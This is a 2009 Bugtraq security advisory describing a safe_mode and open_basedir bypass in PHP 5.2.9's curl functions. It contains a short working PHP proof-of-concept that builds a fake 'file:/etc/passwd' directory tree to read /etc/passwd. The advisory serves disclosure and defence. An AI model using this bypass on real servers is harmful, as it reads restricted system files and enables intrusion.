PHP 5.2.9 curl safe_mode & open_basedir bypass

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: PHP 5.2.9 curl safe_mode & open_basedir bypass
From: cxib@xxxxxxxxxxxxxxxxxx
Date: 10 Apr 2009 13:14:32 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ PHP 5.2.9 curl safe_mode & open_basedir bypass ]

Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - Dis.: 31.12.2008
- - Pub.: 10.04.2009

Original URL:
http://securityreason.com/achievement_securityalert/61

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from 
C, Java and Perl with a couple of unique PHP-specific features thrown in. The 
goal of the language is to allow web developers to write dynamically generated 
pages quickly.

PHP supports libcurl, a library created by Daniel Stenberg, that allows you to 
connect and communicate to many different types of servers with many different 
types of protocols. libcurl currently supports the http, https, ftp, gopher, 
telnet, dict, file, and ldap protocols. libcurl also supports HTTPS 
certificates, HTTP POST, HTTP PUT, FTP uploading (this can also be done with 
PHP's ftp extension), HTTP form based upload, proxies, cookies, and 
user+password authentication.

- --- 1. PHP 5.2.9 curl safe_mode & open_basedir bypass ---
The main problem exist in checking safe_mode & open_basedir for curl functions. 
There is a difference between checking the access and the implementation of the 
operations.

Example code:
curl_setopt($ch, CURLOPT_URL, "file:file:////etc/passwd");

curl in the first place check safe_mode and open_basedir for

"file:////etc/passwd" 
/* realpath is ./file:/etc/passwd */

and in next step will read

"file:////etc/passwd"
(without wrapper => /etc/passwd)

To attack, we need to cheat php by creating a virtual tree like

./file:/
./file:/etc/
./file:/etc/passwd/

Example for /etc/hosts :

./file:/
./file:/etc/
./file:/etc/hosts/

So if you execute the file as user X, we have to create special subdirectories.

- ---EXAMPLE-EXPLOIT---
mkDIR("file:");
chdir("file:");
mkDIR("etc");
chdir("etc");
mkDIR("passwd");
chdir("..");
chdir("..");

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, "file:file:////etc/passwd");
curl_setopt($ch, CURLOPT_HEADER, 0);

curl_exec($ch);

curl_close($ch);
- ---EXAMPLE-EXPLOIT---

The previous changes, may contribute to this error in php 5.2.9.
We will discourages the use ( safe_mode & open_basedir ) as the main security.

Exploit:
http://securityreason.com/achievement_exploitalert/11

- --- 2. Fix ---
Not use safe_mode and open_basedir like a main safety

- --- 3. Greets ---
sp3x Infospec Chujwamwdupe p_e_a pi3 schain and r.i.p. ladybms

- --- 4. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email: cxib [a.t] securityreason [d00t] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (OpenBSD)

iEYEARECAAYFAknfVzEACgkQpiCeOKaYa9bB7wCfUGnETLIyNN1de0A/wwLumeAy
wHMAn3OiRiuKq9ZL4zM0YNH6ix+NSNtQ
=Hcjr
-----END PGP SIGNATURE-----

Prev by Date: [DSECRG-09-035] Chance-i DiViS DVR ActiveX - Heap Overflow
Next by Date: [ MDVSA-2009:089 ] opensc
Previous by thread: [DSECRG-09-035] Chance-i DiViS DVR ActiveX - Heap Overflow
Next by thread: [ MDVSA-2009:089 ] opensc
Index(es):
- Date
- Thread